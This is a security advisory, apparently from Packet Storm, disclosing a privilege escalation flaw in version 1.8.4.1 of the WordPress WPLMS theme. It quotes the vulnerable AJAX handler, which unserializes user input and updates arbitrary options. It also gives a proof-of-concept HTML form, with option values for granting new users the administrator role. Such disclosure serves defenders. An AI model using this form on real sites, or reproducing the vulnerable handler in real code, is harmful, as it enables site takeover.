WordPress WPLMS theme version 1.8.4.1 suffers from a privilege escalation vulnerability.
20bf53d920b0b4f78e622fa2e701a7ebcd9399db4deb7cc6f801c67cb63a9873------------------------------------------------------------------------------
WordPress WPLMS Theme Previlege Escalation
------------------------------------------------------------------------------
[-] Author: Evex
http://packetstormsecurity.com/user/evex/
twitter: https://twitter.com/Evexola
[-] Theme Link:
http://themeforest.net/item/wplms-learning-management-system/6780226
[-] Affected Version:
Version 1.8.4.1
[-] Vulnerability Description:
The vulnerable code is located in the /includes/func.php
script:
add_action( 'wp_ajax_import_data', 'import_data' );
function import_data(){
$name = stripslashes($_POST['name']);
$code = base64_decode(trim($_POST['code']));
if(is_string($code))
$code = unserialize ($code);
$value = get_option($name);
if(isset($value)){
update_option($name,$code);
}else{
echo "Error, Option does not exist !";
}
die();
}
then function import_data can be called by logged in users
and executed which can lead to modifying wordpress settings and adding a
new administrator which may cause the site a full take over
[-] Proof of Concept:
(Must be submited with a logged in user)
OPTION:
admin_email, default_role, users_can_register
Value(must be serialized then encoded by base64):
users_can_register (0,1)
default_role (administrator, author, editor...)
admin_email( whatever@duh.com )
<form action="http://domain.tld/wp-admin/admin-ajax.php?action=import_data"
method="post" >
<input type="hidden" name="name" value="OPTION" />
<input type="hidden" name="code" value="VALUE" />
<button type="submit" >Submit</button>
</form>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed